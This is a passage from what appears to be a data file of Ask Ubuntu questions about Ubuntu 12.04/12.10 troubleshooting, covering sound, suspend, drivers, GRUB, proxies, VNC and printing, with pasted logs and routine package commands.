kernel ... ' linux /boot/vmlinuz-linux root=uuid=0f490b6c-e92d-42f0-88e1-0bd3c0d27641 ro quiet echo 'loading initial ramdisk ... ' initrd /boot/initramfs-linux-fallback.img } lsblk name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda1 8:1 0 39.2m 0 part ├─sda2 8:2 0 19.8g 0 part ├─sda3 8:3 0 205.1g 0 part ├─sda4 8:4 0 1k 0 part ├─sda5 8:5 0 333.7g 0 part /host ├─sda6 8:6 0 233.4g 0 part ├─sda7 8:7 0 100.4g 0 part ├─sda8 8:8 0 100m 0 part ├─sda9 8:9 0 14.7g 0 part ├─sda10 8:10 0 21.4g 0 part └─sda11 8:11 0 3g 0 part sr0 11:0 1 1024m 0 rom loop0 7:0 0 29g 0 loop / blkid /dev/loop0 : uuid= '' fc296be2-8c59-4f21-a3f8-47c38cd0d537 '' type= '' ext4 '' /dev/sda1 : sec_type= '' msdos '' label= '' dellutility '' uuid= '' 5450-4444 '' type= '' vfat '' /dev/sda2 : label= '' recovery '' uuid= '' 78c4fac1c4fa80a4 '' type= '' ntfs '' /dev/sda3 : label= '' os '' uuid= '' dacefcf1cefcc6b3 '' type= '' ntfs '' /dev/sda5 : uuid= '' 01cd7bb998db0870 '' type= '' ntfs '' /dev/sda6 : uuid= '' 01cd7bb99ca3f750 '' type= '' ntfs '' /dev/sda7 : label= '' windows 8 '' uuid= '' 01cdbfb52f925f40 '' type= '' ntfs '' /dev/sda8 : uuid= '' cdbb5770-d29c-401d-850d-ee30a048ca5e '' type= '' ext2 '' /dev/sda9 : uuid= '' 0f490b6c-e92d-42f0-88e1-0bd3c0d27641 '' type= '' ext2 '' /dev/sda10 : uuid= '' 2e7682e5-8917-4edc-9bf9-044fea2ad738 '' type= '' ext2 '' /dev/sda11 : uuid= '' 6081da70-d622-42b9-b489-309f922b284e '' type= '' swap any help is appreciated . please let me know if you need any extra data .
229972	sound indicator broken after 12.10 update ( shows 3 dashes ) , sound settings shows no devices	im using ubuntu 12.10 and my sound has worked great so far . after installing an update i get the same problem described here ( sound broken after installing updates - no hardware present , but some programs play sound ) 3 dashes on the indicator , sound settings shows no devices , i can not set master volume using hotkeys , or the indicator . banshee and some other apps still play sound . pidof pulseaudio brings back nothing typing pulseaudio in the terminal brings : e : [ pulseaudio ] module-ladspa-sink.c : master sink not found e : [ pulseaudio ] module.c : failed to load module `` module-ladspa-sink '' ( argument : `` sink_name=ladspa_output.mbeq_1197.mbeq master=alsa_output.pci-0000_00_1b.0.analog-stereo plugin=mbeq_1197 label=mbeq control=2.0,1.3,0.7,0.0 , -1.3 , -2.0 , -2.3 , -2.6 , -1.6 , -1.0,0.0,0.7,1.0,1.3,2.3 '' ) : initialization failed . e : [ pulseaudio ] main.c : module load failed . e : [ pulseaudio ] main.c : failed to initialize daemon . i do n't know what to do now . i hope someone can help me . thanks a lot .
229976	mod_usertrack with x-forwarded-for ( proxy ) ips , apache 2.2	i 'm using apache 2.2 with mod_usertrack , behind a reverse proxy ( load balancer ) . now , the proxy disguises the client 's real ip addresses ( keeps them in the x-forwarded-for header ) , and forwards the request along . mod_usertrack uses the clients ' ip ( along with some noise ) to generate a guid for each client . however , because of the proxy , it only sees a single ip and the generated guids for each client are very similar ( even with some possible collisions ) . i would like to upgrade apache to version 2.4 , but it seems to be somewhat of a project . i did manage to compile it using this post and a few others , only to discover the folder structure does not resemble the one i had before ( default ubuntu ) . i 'm weary of tweaking it myself ... and i will be making my life miserable if i want to upgrade the server later on . so ... what are my options ? is there a good unofficial repository that packages apache 2.4 for oneiric ? ( please provide a short 'how to ' , i 'm not great in installing packages ) is there an alternative route to solve this ? ( upgrading just the user_track module ? another module that works with apache 2.2 ? )
229977	how can the original icons and fonts be restored in ubuntu 12.10 ?	recently i installed cairo-dock and changed the original ubuntu theme . then i uninstalled it , but the icons on the left side did n't get restored into its original look . somewhere i found a command sudo apt-get autoremove -- purge light-themes sudo apt-get install light-themes after running this command the theme did n't changed but it seems that the font of the original ubuntu changed a little . i want the theme of ubuntu as it was when i newly installed it . moreover , the alt+tab and some other key combination not working normally . please help .
229978	best filesystem for a shared data space ?	i want to have a partition mounted to both window 's `` my documents '' and ubuntu 's `` my documents '' . what are the advantages and disadvantages of fat and ntfs ? is there an accepted standard or common way of doing this ? by fat , i mean either fat , fat16 , fat32 , or exfat .
229979	slow pc with ubuntu 12.04 gnome	i 've been having trouble with my computer since i installed ubuntu 10.10 for the first time . at first it ran quickly and i was glad i installed it , but after some time i updated to 11.04 and newer versions and the computer began crashing . i 've changed swappiness to 10 % , removed the extra workspaces , purged it and switched to gnome instead of unity , but it 's still slow . i ca n't even watch youtube videos , beacuse they make the computer freeze . some info : disk space : 20gb processor : amd sempron ( tm ) processor 2500+ memory : 1.9 gib available disk space : 9.4 gib release 12.04 ( precise ) 32-bit i do n't have any pictures nor documents inside , 3.1 gb of music , and wine . i hope i gave enough information , and i thank you for helping me with all my trouble .
229981	ubuntu 12.04 lts wo n't suspend	if i put my computer in suspend mode , it wakes up instantly . here 's the dmesg output : [ 532883.492262 ] pm : syncing filesystems ... done . [ 532883.506700 ] pm : preparing system for mem sleep [ 532883.770502 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . [ 532883.786393 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . [ 532883.802373 ] pm : entering mem sleep [ 532883.802435 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 532883.802671 ] hdaps : setting ec_rate=0 , filter_order=1 [ 532883.986749 ] pm : suspend of drv : psmouse dev : serio2 complete after 184.335 msecs [ 532883.987128 ] sd 1:0:0:0 : [ sdb ] synchronizing scsi cache [ 532883.987179 ] sd 1:0:0:0 : [ sdb ] stopping disk [ 532883.987210 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 532883.988363 ] sd 0:0:0:0 : [ sda ] stopping disk [ 532884.233649 ] pm : suspend of drv : tpm_tis dev:00:0a complete after 190.308 msecs [ 532884.233804 ] xhci_hcd 0000:05:00.0 : warn : xhc cmd_run timeout [ 532884.233816 ] suspend_common ( ) : xhci_pci_suspend+0x0/0x40 returns -110 [ 532884.233820 ] pci_pm_suspend ( ) : hcd_pci_suspend+0x0/0x30 returns -110 [ 532884.233824 ] pm_op ( ) : pci_pm_suspend+0x0/0x130 returns -110 [ 532884.233826 ] pm : device 0000:05:00.0 failed to suspend async : error -110 [ 532884.234927 ] sdhci-pci 0000:0d:00.0 : pci int a disabled [ 532884.391729 ] pm : suspend of drv : sd dev:1:0:0:0 complete after 405.200 msecs [ 532884.391840 ] pm : some devices failed to suspend [ 532884.392158 ] sd 0:0:0:0 : [ sda ] starting disk [ 532884.392307 ] sd 1:0:0:0 : [ sdb ] starting disk [ 532884.405332 ] sdhci-pci 0000:0d:00.0 : bar 0 : set to [ mem 0xf1400000-0xf14000ff ] ( pci address [ 0xf1400000-0xf14000ff ] ) [ 532884.405470 ] sdhci-pci 0000:0d:00.0 : restoring config space at offset 0x1 ( was 0x100002 , writing 0x100006 ) [ 532884.405511 ] sdhci-pci 0000:0d:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 532884.514019 ] pm : resume of drv : dev : ep_00 complete after 121.672 msecs [ 532884.514023 ] pm : resume of drv : usbhid dev:1-1.1:1.0 complete after 121.703 msecs [ 532884.514077 ] pm : resume of drv : dev : ep_81 complete after 121.747 msecs [ 532884.514100 ] pm : resume of drv : uvcvideo dev:1-1.6:1.1 complete after 121.831 msecs [ 532884.514103 ] pm : resume of drv : dev : ep_00 complete after 121.819 msecs [ 532884.514118 ] pm : resume of drv : uvcvideo dev:1-1.6:1.0 complete after 121.879 msecs [ 532884.514141 ] pm : resume of drv : dev : ep_81 complete after 121.889 msecs [ 532884.881330 ] pm : resume of drv : sd dev:1:0:0:0 complete after 489.741 msecs [ 532884.881380 ] pm : resume of drv : scsi_disk dev:1:0:0:0 complete after 451.459 msecs [ 532884.881416 ] pm : resume of drv : scsi_device dev:1:0:0:0 complete after 489.817 msecs [ 532884.908619 ] sdhci-pci 0000:0d:00.0 : setting latency timer to 64 [ 532884.908738 ] pm : resume of drv : sdhci-pci dev:0000:0d:00.0 complete after 517.618 msecs [ 532884.910009 ] hdaps : initial mode latch is 0x05 [ 532884.910148 ] hdaps : setting ec_rate=250 , filter_order=2 [ 532884.910391 ] pm : resume of devices complete after 519.320 msecs [ 532884.910466 ] pm : resume devices took 0.520 seconds [ 532884.910482 ] pm : finishing wakeup . any ideas ?
229986	how to fix mission-control-5 error when using empathy on ubuntu 12.10	when i start empathy messenger i get the following error : error contacting the account manager there was an error while trying to connect to the telepathy account manager . the error was : process /usr/lib/telepathy/mission-control-5 exited with status 127 when i click the ok button the message disappears but adding an account does n't work , when clicking on the button nothing happens . the only working part is the close button : ) any idea 's on how to fix it ? thanks in advance .
229989	how to setup x11vnc to access with graphical login screen ?	i have a server running ubuntu 12.10 and need to be able to remote to this server without being logged-in . i have found many solutions , but none seem to work with 12.10 . can anyone give me step-by-step instructions on how to configure x11vnc to start as a service ( prior to user login ) so that when connecting with vnc i will be presented with a graphical login screen ? i 'm new to linux so please give as much detail as possible in your responses/comments . thanks
229990	providing ssh tunnling , what to think about when configuring ubuntu server	recently i 've considered , mostly as a pet project , to set up accounts for a closed group of users via ssh to my box with the purpose of ssh tunnling things like web traffic -- some of it for friends that live abroad and perhaps also to help some people bypass national censorship . there 's some things i imagine that i need to do , such as : disabling shell access by setting the shell to /bin/false or similar . get some software that can track bandwidth usage on a per-user basis historically make sure that each user can only use a certain amount of bandwidth . the reason i 'm posting here to begin with is to look around and get some pointers regarding what kind of things i should read up on , as well as hearing if there are any software recommendations for doing what i 'm trying to do . i already know a bit since i 've actually gotten ssh tunnling up and running already , i just do n't feel like letting it loose to other people without restrictions and some basic monitoring . i 'm primarily trying to learn here , so if you think this is a very bad idea ( or if you have a better idea on how to do this ) then by all means say so , but please include some information on how to do it : ) ( i 'm also open to trying things like openvpn but it seems really hard to set up , also i 've heard ssh more often works in locked down environments )
229996	are there instructions for removing or rebuilding the graphical interface ?	recently , i could not log in on a regular user desktop installation through the graphical login screen . however , i was able to successfully log in by switching ( ctrl+alt+f1 ) to terminal mode . eventually , through the terminal mode i resolved the problem . in researching my issue , on the ubuntu forum ; i noticed that there were numerous causes concerning the inability to use the graphical login screen . which made finding the correct fix difficult . the simplest approach would seem to be a total `` tear-down '' of the graphical interface with a rebuild to resolve the login issue instead of spending a significant amount of time attempting to isolate a specific cause . essentially applying a `` nuclear option '' . after extensive research and numerous dead-ends ; i found out my problem was caused by `` brltty '' , but that is not my question . my question : a listing of the packages that need to be removed so that ubuntu simply boots into terminal mode ( no graphical interface ) . then a sequential listing of what packages need to be reinstalled to restore the graphical interface ( which i assume are the same packages that were removed ) . basically , a short tutorial on removing the graphical interface and rebuilding it .
230003	do i need nvidia driver for dell inspiron 5720 ?	so i bought my dell inspiron 5720 month ago . sure the first thing i did was purging windows and installing ubuntu 12.04 . now , i use it for a month already . only driver i installed during all this time was broadcom adapter driver so that wi-fi could work . so i never really installed video adapter driver , even though my laptop has a powerful nvidia geforce gt 630m video adapter .system settings say that intel速 ivybridge mobile adapter is used instead . i never really had any problems with laptop performance capacity : movies play very good , web and ides work fast . i never played on it though . my question is : do i need to install nvidia adapter drivers ? why should i do it ? thanks ! upd : forgot to mention : i do n't have anything in my additional drivers section . here is how it looks like : lspci results : lspci -v gives 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 0565 flags : bus master , fast devsel , latency 0 , irq 45 memory at f1000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at [ disabled ] capabilities : kernel driver in use : i915 kernel modules : i915 and 01:00.0 3d controller : nvidia corporation device 1140 ( rev a1 ) subsystem : dell device 0565 flags : fast devsel , irq 16 memory at f0000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 3000 [ size=128 ] expansion rom at [ disabled ] capabilities : kernel modules : nouveau , nvidiafb
230006	in 12.04/12.10 , what calls the precise/quantal-wallpapers.xml files ?	i 'm having a hard time sorting out what script or program calls the precise-wallpapers.xml or quantal-wallpapers.xml ? after upgrading to 12.10 , my wallpaper selection is still the precise-wallpapers.xml , though the quantal xml file and all the wallpaper files exist in usr/share/backgrounds directory . related , certainly there must be a prober script similar in concept to the 30-os-prober script for grub for creating those .xml files , right ?
230014	how export contacts of ubuntu one ?	how export contacts of ubuntu one in 12 . 10 ? another questions ( possible duplicates ) is about old versions , and packages like evolution-couchdb are removed in previous versions , thunderbird do n't support couchdb . i can see my contacts in https : //one.ubuntu.com/contacts/ .
230015	i can not open software-center in 12.10	i can not open the software center from a couple of days ago . it is very estrange because when i throw the application from the console with sudo it is opened normally ... i paste the console text : ramis @ ramis-laptop : ~ $ software-center 2012-12-17 19:19:14,036 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-12-17 19:19:14,177 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-12-17 19:19:20,009 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-12-17 19:19:20,129 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2012-12-17 19:19:20,128 - root - error - could not find any typelib for launchpadintegration 2012-12-17 19:19:20,840 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-12-17 19:19:20,857 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) terminado ( killed ) thanks
230017	moving thunderbird mails from ubuntu to windows ( thunderbird )	i currently have an ubuntu work machine , where i 'm using thunderbird as my mail client . how can i export my mail/contacts/etc . to a windows machine , that is also running thunderbird . i know that normally , you can just copy .thunderbird , on linux , but i 'm not sure if the windows version has a similar folder .
230018	sublime text 2 permission denied	i use a papyrus package with sublime text 2 , but when i try to compile a file by pressing ctrl+b or f7 i get a permission error ; [ errno 13 ] permission denied [ cmd : [ u'/home/sde/.wine/drive_c/program files/the elder scrolls v skyrim/papyrus compiler/scriptcompile.bat ' , u'/home/sde/.wine/drive_c/program files/the elder scrolls v skyrim/data/scripts/source/myfirstscript.psc ' ] ] [ dir : /home/sde/.wine/drive_c/program files/the elder scrolls v skyrim/data/scripts/source ] [ path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin ] [ finished ] even when i run sublime text 2 as root . any suggestions ? thanks in advance !
230024	unable to use apt-get or cpan	i am using ubunto 12.10 . a few days back i needed to change my proxy for connecting to the internet at my institute . after that i ca n't access the internet through terminal like ca n't install cpan lib for perl or install using apt-get . i changed my proxy to http host 172.0.16.200 and port 3128 . while i was back i used no proxy using firefox > preferencs > advanced > network > settings and also from network > networkproxy > none but while i try to install something i get message to authenticate for proxy server . it asks me for user name and password . debasish @ debasish : ~ $ sudo cpan app : :cpanminus [ sudo ] password for debasish : fetching with http : :tiny : ... ... ... ... ... ... ... ... ... ... ... ../01mailrc.txt.gz http : :tiny failed with an internal error : could not connect to '172.16.0.200:3128 ' : io : :socket : :inet : connect : timeout at /usr/share/perl/5.14/http/tiny.pm line 139 proxy authentication needed ! ( note : to permanently configure username and password run o conf proxy_user your_username o conf proxy_pass your_password ) username : debasish.mukherjee trying with /usr/bin/wget -o `` /home/debasish/.cpan/sources/authors/01mailrc.txt.gz.tmp4734 '' to get ... ... ... ... ... ... ... ... ... ... ... ... ... 01mailrc.txt.gz -- 2012-12-18 01:06:16 -- http : //cpan.repo.unpas.ac.id/authors/01mailrc.txt.gz connecting to 172.16.0.200:3128 ... failed : connection timed out . retrying . -- 2012-12-18 01:07:20 -- ( try : 2 ) ... ... and it ultimately fails i also ca n't install from `` ubuntu software centre '' or update my os as it showing `` requires installation of untrusted packages '' please help i am really in a trouble .
230026	ubuntu desktop or server for voip server ?	if i wanted to install ubuntu to run an voip server such as freeswitch , which version would you recommend i install ? would a basic desktop do or do i have to install a server version ?
230031	usb devices and flash disks mount as root instead of the user	after reinstalling ubuntu 12.04 i am facing a strange problem . anytime i plug in a flash key , kindle etc. , i can see it , but ca n't write . owner of the device on say /media/usb0 is root . when i try to write as root , eg . sudo cp or via root privileged file manager , it works , but is extremly slow . what could cause such thing ? edit : my /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda2 during installation uuid=595815c2-d882-4ec8-a2cd-cce70471167c / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda6 during installation # uuid=1340a336-66ca-4743-a6e4-41a307af2dda /boot ext4 defaults 0 3 # swap was on /dev/sda5 during installation uuid=afa49f1d-d505-4166-82a2-2f44548a48c6 none swap sw 0 0 uuid=deb86039-528a-45f3-b5f9-ce528740c94e /data_hdd ext4 defaults 0 2
230034	hdmi resolution problem	i connected my laptop to the tv with a hdmi cable but the 1920x1080 resolution gives me problems . if i set any other resolution is all great because i can set in the settings of the tv the option `` dot per dot '' . but when i change the resolution to 1920x1080 i can not do it . someone is able to tell me the reason ? thanks in advance !
230038	ca n't uninstall ubuntu and install mint	i 'm using ubuntu 12.10 . i 've `` mint '' bootable cd . i just want to delete ubuntu and setup mint . firstly , i inserted my `` mint '' disk and rebooted my pc . the installtion did n't start . then i changed my boot settings to cd ; again , nothing happened . how can i setup my linux mint bootable cd ?
230039	installing canon ip2600 printer drivers on ubuntu 12.10	i followed instructions from serveral pages ( e.g . here ) to install canon ip2600 printer drivers that were discussed for ubuntu 12.04 or earlier as follows : sudo add-apt-repository ppa : michael-gruz/canon sudo apt-get update sudo apt-get install cnijfilter-ip2600series after that , the printer is listed and a printer properties window can be open . trying to print anything fails with a message `` processing - waiting for printer to become available . '' next to printer state . does anybody know how to get the printer to work ? i am running ubuntu 12.10 on 64 bit .
230040	how do i remove twitter and/or other things i `` install '' in firefox	when the popup appeared saying , `` do you want to install this for quicker access '' or something like that , i said yes and clicked yes , thus it installed . i want to uninstall it .
230050	how can i use wobbly windows effect on cinnamon ?	i would like to know if possible , then how to achieve wobbly windows and cube on cinnamon gui ? i am running ubuntu 12.04 minimal with cinnamon mdm is the login manager i use .
230052	how to create shared home directories across multiple computers ?	i know there are ways to share a folder across computers making it easy to move files . but i was wondering how one would setup a single login which lets you access the same files regardless of which machine you login on ? what i would like is something similar to something you would see in a college campus where students login on machines in the lab and see their files regardless of which machine they use . i know there are server involved here . i have a need to create this on a smaller scale where we have a few computers available ( and one of these could act as the server if needed and host the files ) that every one shares . note , the specific install of software might be different on each computer but the login and os are the same . since some computers have additional capability that our group members will need to use at rotating schedules ( software licenses or hardware components , etc. ) . i have not done this before , so i would appreciate detailed instructions if possible or a reference to a guide that describes this . thanks in advance .
230055	read qr and other bar codes from screen	i 'm looking for a simple way to read bar codes , data matrix and qr codes . the scenario : i have it on my pc screen ( website , photo , pdf , webcam ) , want the contained text i 'm on kde , kubuntu precise , but other compatible reasonable non-kde solutions have a chance .
230061	disabled sound through hdmi when i had windows	i am a complete linux noob but when i had windows installed i had disabled in the bios sound coming through hdmi so i could use my speakers . i just installed linux yesterday and theres no sound coming through my hdmi cord and under the sound settings there isnt an hdmi setting , is this becuase i dont have the drivers installed for my ati radeon 4850 video card ?
230063	get thinkpad orientation	on windows , screen orientation of my thinkpad w520 can automatically change if i rotate the computer to hold it like a book . is it possible to detect computer orientation on linux ?
230071	can dolphin manage the desktop ?	i am looking to replace nautilus on lxde with dolphin . at the moment i rely on nautilus to manage the desktop , i.e . access ~/desktop from the desktop and display mounted drives as icons . can the same thing be done with dolphin ? if so , how ? note : i am searching for a way to start dolphin headless mode at startup , akin to nautilus with nautilus -- no-default-window .
230074	completely remove deluge configuration files	deluge broke recently ( ca n't contact trackers ; i gave it a bad setting somewhere ) and i 'm trying to purge all configuration files and install it again . if i run sudo apt-get purge deluge deluge-gtk & & sudo apt-get install deluge deluge-gtk , it comes back with the same preferences . i suspect that delge 's configuration files are stored somewhere in /home , but i do n't know where exactly .
230076	open a file with microsoft word	i have word installed with playonlinux ( front-end and helper scripts for wine ) . i 'd like to be able to select `` open with '' when downloading a .doc file with firefox and open it quickly as can be done with libreoffice . i found from the .desktop file that the command to run word is /usr/share/playonlinux/playonlinux -- run `` microsoft word 2010 '' . however , when trying to add a new program i 'm not able to give it a command-line , just an executable with no parameters . is this even possible ?
230080	ubuntu is slow on oracle virtualbox	i have just installed ubuntu 12.04 on oracle virtualbox 4.2 and when i click on dash home it takes several minutes to open and when it does i try to open software update but it just hangs . what may be the problem ? how can i make it more responsive ? specs : ubuntu 12.04 32bit base memory 512mb video memory : 12mb storage : virtual size 20gb
230081	charger status not updating	i am running ubuntu 12.10 on a toshiba satellite l775-s7105 , and i recently tried to make some changes to the grub file . what i was trying to fix did n't work , and now my battery status at the top right is not updating . if i boot with it plugged in , it says it is plugged in , and vice-versa . my grub file has these contents : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' i am new to this , and have no idea what to change , so any help would be appreciated . update : wow . that was fast . i suspended , logged back in , and rebooted , and it is fixed .
230085	`` amd unsupported hardware '' watermark	i updated my amd proprietary drivers successfully from xorg-edgers ppa . when i restarted my laptop , it loads the proprietary driver fine and seems to perform slightly better than the previous version , but this watermark appeared when my laptop displays the login screen . the watermark reads `` amd unsupported hardware '' . i have a amd radeon hd 6620g mobile integrated gpu . it is integrated graphics on my amd a8-3500m apu ( accelerated processing unit ) . is there any way to get rid of the watermark on my screen ? it does not show up on screenshots , otherwise i would post a screenshot .
230089	still asking whether i want to boot into ubuntu although there is no ubuntu partition any more	my ubuntu partition is gone but when i boot up , grub still asks if i want to boot into windows 7 or ubuntu . to put it simply how do i get it to stop asking for ubuntu and only have 7 .
230094	impossible to make logitech cam work skype	i have installed skype 4.1 in ubuntu 12.04 but unfortunately i can not make the logitech cam work as a microphone . i have tried all sorts of things pulse audio skype options but nothing works . what can i do i am desparate ... i attach pics of the pulseaudio and skype audio options ! /i.stack.imgur.com/oirhu.png
230096	how to use thunderbird 's address book in libreoffice ?	i 'm using libreoffice ( 3.5 ) and thunderbird ( 17.0 ) on my ubuntu 12.04 machine and store my contacts with thunderbird . these contacts are organized in several address books . for each i get a .mab-file ( mork ) in /home/user/.thunderbird/xyxyxyxy.default/ . what 's the finest and/or easiest option to access these contacts from libreoffice ? i have already read that there should be an option to access the thunderbird address book easily but thunderbird does not appear as a data source in libreoffice ( file > > wizards > > address data source ) . the package libreoffice-base is already installed . if possible , i want to prevent to export my contacts in another storage format . thanks and cheers !
230098	wifi driver install authorization	bought a netis wireless adapter . it comes with quick install directions that only covers windows although the driver cd has a linux driver . tried to install the driver ( which was zipped ) and was told that i did n't have sufficient permissions to extract the file . i am the only user and the administrator for the computer . how do i get to the ubuntu 12.04 permission screen to put in my password and gain authorization ?
230099	how can i browse linux kernel package source like i can other packages on launchpad ?	i want to go here https : //code.launchpad.net/ubuntu/+source/linux and see how the kernel is packaged . specifically i think there may be an old debian patch still in there that is affecting my hardware . e.g . https : //code.launchpad.net/ubuntu/+source/libevent shows the branches for the various releases and i can choose a branch and browse files . how can i do this for the linux kernel ?
230102	how do i turn off `` show mouse '' when i press ctrl ?	i 've searched everywhere in the system settings but i still ca n't find it .
230105	dbuses and apaches are using up memory	i recently noticed , in system monitor , that multiple apache2 processes are showing up ( with the same `` command line '' ) . there are currently 6 of them , each with 7mb memory . i also noticed a whole bunch of dbus processes . is this normal , and is there a way to keep these from using up so much memory ?
230106	how to set volume in xubuntu ?	i want to set via my media keys , so i first have to find out the terminal-command . outputs are : amixer set master 10 % - amixer : unable to find simple control 'master',0 amixer scontrols simple mixer control 'iec958',0 amixer set 'iec958 ' 50 % - amixer : invalid command ! how can i fix that ?
230110	login screen returns to login screen	after many many reboots in a couple days while experimenting with bios settings effecting the speed hardbrake runs at , today i find after a reboot that i have to type in password to log in - ordinarily i have this disabled . when i do enter my password , it goes to a black screen for a bit , then returns . i can log in as guest , which does the same thing ( minus the password ) and if i use the wrong password , it complains instead of doing the same . using the install disc , i see three partitions on my drive , a ~200 mb boot sector , and two 32 gb ( one extended ) which seem to share the rest of the ssd . running fsck seems to generate tons of errors . the odd bits : all my background stuff is running - i can access stuff served by subsonic , and see network shares from my windows machines . i can log in in another terminal and do stuff ... i just ca n't get into the gui/os proper . sort of at a loss where to start . would be happy to free drive of errors if i could ( i 've another machine , i could mount drive over usb and check it ) , but it seems everything else is working ? edit : screensaver also seems to kick on , even from fsck 's run from the boot menu . i3-2100t , h67 chipset i believe , 12.10 , everything 's been working fine for the better part of a year . seen several similar topics , but either they turn out to be something unrelated ( fresh install or known graphics issues ) or there are no answers . i 'm happy to get any logs/info anyone want . starting to think ssd is corrupted in some way that 's preventing booting . ca n't get fsck to complete on it . update : ran `` '' fsck -n /dev/mapper/ubunutu-root '' '' got the answer it was clean . ok , here 's a copy of my xorg.0.log.old file : [ 340.321 ] x.org x server 1.13.0 release date : 2012-09-05 [ 340.321 ] x protocol version 11 , revision 0 [ 340.321 ] build operating system : linux 3.2.0-26-generic i686 ubuntu [ 340.321 ] current operating system : linux hbo 3.5.0-19-generic # 30-ubuntu smp tue nov 13 17:49:53 utc 2012 i686 [ 340.321 ] kernel command line : boot_image=/vmlinuz-3.5.0-19-generic root=/dev/mapper/ubuntu-root ro quiet splash vt.handoff=7 [ 340.321 ] build date : 27 november 2012 07:44:37am [ 340.321 ] xorg-server 2:1.13.0-0ubuntu6.1 ( for technical support please see http : //www.ubuntu.com/support ) [ 340.321 ] current version of pixman : 0.26.0 [ 340.321 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 340.321 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 340.321 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : tue dec 18 16:34:28 2012 [ 340.321 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 340.321 ] ( == ) no layout section . using the first screen section . [ 340.321 ] ( == ) no screen section available . using defaults . [ 340.321 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 340.321 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 340.322 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 340.322 ] ( == ) automatically adding devices [ 340.322 ] ( == ) automatically enabling devices [ 340.322 ] ( == ) automatically adding gpu devices [ 340.322 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 340.322 ] entry deleted from font path . [ 340.322 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 340.322 ] entry deleted from font path . [ 340.322 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 340.322 ] entry deleted from font path . [ 340.322 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 340.322 ] entry deleted from font path . [ 340.322 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 340.322 ] entry deleted from font path . [ 340.322 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 340.322 ] entry deleted from font path . [ 340.322 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 340.322 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 340.322 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 340.322 ] ( ii ) loader magic : 0xb7787640 [ 340.322 ] ( ii ) module abi versions : [ 340.322 ] x.org ansi c emulation : 0.4 [ 340.322 ] x.org video driver : 13.0 [ 340.322 ] x.org xinput driver : 18.0 [ 340.322 ] x.org server extension : 7.0 [ 340.322 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 340.323 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0102:19da : a166 rev 9 , mem @ 0xfe000000/4194304 , 0xc0000000/268435456 , i/o @ 0x0000f000/64 [ 340.323 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 340.323 ] initializing built-in extension generic event extension [ 340.323 ] initializing built-in extension shape [ 340.323 ] initializing built-in extension mit-shm [ 340.323 ] initializing built-in extension xinputextension [ 340.323 ] initializing built-in extension xtest [ 340.323 ] initializing built-in extension big-requests [ 340.323 ] initializing built-in extension sync [ 340.323 ] initializing built-in extension xkeyboard [ 340.323 ] initializing built-in extension xc-misc [ 340.323 ] initializing built-in extension security [ 340.323 ] initializing built-in extension xinerama [ 340.323 ] initializing built-in extension xfixes [ 340.323 ] initializing built-in extension render [ 340.323 ] initializing built-in extension randr [ 340.323 ] initializing built-in extension composite [ 340.323 ] initializing built-in extension damage [ 340.323 ] initializing built-in extension mit-screen-saver [ 340.323 ] initializing built-in extension double-buffer [ 340.323 ] initializing built-in extension record [ 340.323 ] initializing built-in extension dpms [ 340.323 ] initializing built-in extension x-resource [ 340.323 ] initializing built-in 